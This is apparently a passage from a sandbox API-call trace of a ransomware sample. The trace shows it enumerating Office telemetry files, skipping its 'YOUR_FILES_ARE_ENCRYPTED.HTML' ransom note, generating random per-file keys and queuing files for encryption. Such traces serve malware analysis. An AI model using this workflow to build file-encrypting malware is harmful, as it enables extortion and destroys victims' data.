cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat", cAlternateFileName="{1C990~1.DAT")) returned 1 [0159.616] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat") returned 146 [0159.616] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.616] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0159.616] lstrlenW (lpString=".dat") returned 4 [0159.616] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0159.616] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (0) - 2028 - winword.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.617] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=845) returned 1 [0159.617] GetProcessHeap () returned 0x270000 [0159.617] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.617] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FD") returned 2 [0159.617] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="17") returned 2 [0159.617] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="D5") returned 2 [0159.617] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="AF") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="99") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="54") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="08") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="9E") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="69") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="31") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="E4") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="5B") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F3") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="93") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="71") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="98") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="4C") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="08") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="D3") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="AB") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="F9") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="66") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="25") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="76") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CA") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="B5") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="EB") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="11") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="BB") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="59") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="60") returned 2 [0159.618] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0F") returned 2 [0159.619] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat" [0159.619] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.619] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.619] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat", cAlternateFileName="{1C990~4.DAT")) returned 1 [0159.619] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat") returned 136 [0159.620] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.620] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.620] lstrlenW (lpString=".dat") returned 4 [0159.620] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.620] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (1) - 2028 - winword.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.621] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=300) returned 1 [0159.621] CloseHandle (hObject=0x58c) returned 1 [0159.622] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1e1, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat", cAlternateFileName="{1C990~3.DAT")) returned 1 [0159.622] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat") returned 146 [0159.622] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.622] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0159.622] lstrlenW (lpString=".dat") returned 4 [0159.622] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat") returned=".dat" [0159.622] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (1) - 2028 - winword.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (1) - 2028 - winword.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.622] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=481) returned 1 [0159.622] CloseHandle (hObject=0x58c) returned 1 [0159.622] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11d, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat", cAlternateFileName="{2D5D3~2.DAT")) returned 1 [0159.622] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat") returned 137 [0159.622] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.622] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.622] lstrlenW (lpString=".dat") returned 4 [0159.623] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.623] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (0) - 2480 - powerpnt.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.623] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=285) returned 1 [0159.623] CloseHandle (hObject=0x58c) returned 1 [0159.623] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x351, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat", cAlternateFileName="{2D5D3~1.DAT")) returned 1 [0159.623] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned 147 [0159.623] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.623] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.623] lstrlenW (lpString=".dat") returned 4 [0159.623] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.623] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (0) - 2480 - powerpnt.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.624] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=849) returned 1 [0159.624] GetProcessHeap () returned 0x270000 [0159.624] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0159.639] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="7A") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="80") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="E9") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DD") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="77") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="3A") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="C9") returned 2 [0159.639] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="B1") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="CD") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="B9") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="8D") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A6") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="17") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="A8") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="0E") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="62") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="EF") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="26") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="0B") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="74") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="3B") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="42") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="F2") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="44") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="09") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A4") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="7E") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="83") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="24") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="46") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="2C") returned 2 [0159.640] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="71") returned 2 [0159.641] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat" [0159.641] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.641] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0159.655] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat", cAlternateFileName="{2D5D3~4.DAT")) returned 1 [0159.656] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat") returned 137 [0159.656] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.656] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.656] lstrlenW (lpString=".dat") returned 4 [0159.656] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat") returned=".dat" [0159.656] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (1) - 2480 - powerpnt.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.658] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=300) returned 1 [0159.658] CloseHandle (hObject=0x58c) returned 1 [0159.658] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe93ec620, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe93ec620, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe93ec620, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1e1, dwReserved0=0x0, dwReserved1=0x60, cFileName="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat", cAlternateFileName="{2D5D3~3.DAT")) returned 1 [0159.658] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned 147 [0159.658] lstrcmpW (lpString1="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.658] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.658] lstrlenW (lpString=".dat") returned 4 [0159.658] PathFindExtensionW (pszPath="{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat") returned=".dat" [0159.658] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (1) - 2480 - powerpnt.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{2d5d3b0c-dc37-43db-8b18-d419e1b30f6f} (1) - 2480 - powerpnt.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.659] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=481) returned 1 [0159.659] CloseHandle (hObject=0x58c) returned 1 [0159.659] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf8c0c00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf8c0c00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf8c0c00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x117, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat", cAlternateFileName="{DF01D~2.DAT")) returned 1 [0159.659] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat") returned 134 [0159.659] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.659] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.659] lstrlenW (lpString=".dat") returned 4 [0159.659] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.659] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (0) - 2104 - excel.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.660] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=279) returned 1 [0159.660] CloseHandle (hObject=0x58c) returned 1 [0159.660] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, 